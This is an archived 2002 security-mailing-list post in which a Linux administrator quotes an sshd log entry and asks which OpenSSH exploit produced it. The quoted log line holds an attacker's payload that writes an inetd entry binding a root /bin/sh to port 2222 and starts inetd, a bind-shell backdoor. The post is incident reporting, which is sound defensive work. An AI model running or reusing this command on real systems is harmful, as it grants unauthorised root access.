Security Incidents mailing list archives
OpenSSH Attack?
From: Ulrich Keil <ulrich () der-keiler de>
Date: Sat, 29 Jun 2002 22:01:51 +0200
I run OpenSSH 3.3p1 on linux (sparc) and found these line in my /var/log/messages: Jun 28 22:27:27 www sshd[21761]: Bad protocol version identification 'echo "2222 stream tcp nowait root /bin/sh sh -i">> /tmp/h;/usr/sbin/inetd /tmp/hn/inecho "2222 strea' from 192.192.230.233 Doesn't look like the OpenSSH exploit for OpenBSD 3.1 posted by Christophe Devine on Bugtraq (www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-06/0354.html) to me. Is another exploit known which produces such an output? Ulrich Keil -- http://www.der-keiler.de PGP Fingerprint: 5FA4 4C01 8D92 A906 E831 CAF1 3F51 8F47 1233 9AAD Public key available at http://www.der-keiler.de/uk/pgp-key.asc -----BEGIN GEEK CODE BLOCK----- Version: 3.12 GCS d- s-:- a-- C++ UL+++ P++ L+++ E--- W+++ N++ o- K- w-- O- M- V- PS PE Y+ PGP++ t+ 5 X R tv b+ DI- D++ G e h-- r++ y+ ------END GEEK CODE BLOCK------
Attachment:
_bin
Description:
Current thread:
- OpenSSH Attack? Ulrich Keil (Jul 01)
- Re: OpenSSH Attack? Bill McCarty (Jul 02)
- Re: OpenSSH Attack? Mike Lewinski (Jul 02)
- Re: OpenSSH Attack? Bill McCarty (Jul 02)